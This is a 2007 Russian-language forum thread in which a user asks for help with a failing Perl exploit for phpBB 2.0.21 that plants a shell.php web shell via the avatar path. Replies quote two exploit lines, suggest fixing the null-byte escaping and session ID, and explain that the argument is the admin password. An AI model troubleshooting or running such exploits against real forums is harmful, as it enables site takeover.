Траблы со сплоитом для phpBB 2.0.21

Discussion in 'Песочница' started by Юличка, 24 May 2007.

Thread Status:
Not open for further replies.
  1. Юличка

    Юличка New Member

    Joined:
    13 Jun 2004
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Народ у меня на локалке форум phpBB 2.0.21 стоит путь http://server/index.php

    узаю этот сплоит

    пишу в ком.строке
    c:\PERL\bin\perl.exe c:\phpbb.pl http://server/ 44c59e4934c79044faa953ad91bf7f45 images/avatars/shell.php

    а мне в ответ это пишет:
    Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 52
    .
    Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 53
    .

    что не то помогите плз!
     
    1 person likes this.
  2. Gh0s7

    Gh0s7 Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    160
    Likes Received:
    231
    Reputations:
    242
    Однако. Это бага специально видимо =\

    Code:
    $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
    $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
    
    В первой строке скорее всего должен быть sid.
    Во второй %00 интерпретируется как хэш, меняй на "\%00" или '%00'.
    Как автор выдергивает сид я хз, мб в пхпбб бордах это хэш пасса, тогда $ARGV[1], если нет, то хз =\
    Влом чекать.
     
  3. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    на писано ж:
    это переводится как юзай admin pass а не хеш , Юличка
     
Thread Status:
Not open for further replies.